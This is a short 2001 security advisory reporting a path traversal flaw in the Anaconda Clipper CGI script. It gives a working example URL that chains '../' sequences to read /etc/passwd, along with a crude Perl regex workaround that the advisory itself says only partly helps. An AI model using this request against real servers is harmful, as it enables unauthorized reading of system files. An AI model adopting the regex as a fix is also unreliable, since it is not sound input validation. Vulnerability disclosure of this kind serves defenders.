---=== UkR security team - Advisory no. 11 ===--- Anaconda Clipper - 'arbitrary file retreival' vulnerability Date: 27.03.2001 Problem: input validation error. Vulnerable products: Anaconda Clipper ver. 3.3 (probably others, but not tested) Product vendor: Anaconda / http://www.anaconda.net Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally (for ex., /etc/passwd). Workaround: # this will help in somewhat... $input =~ s/[(\.\.)|\/]//g; Author: UkR-XblP / UkR security team / http://www.ukrteam.ru Example: http://blah.somenonexistanthost.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd -------------------------------------------------------------------------------- UkR XblP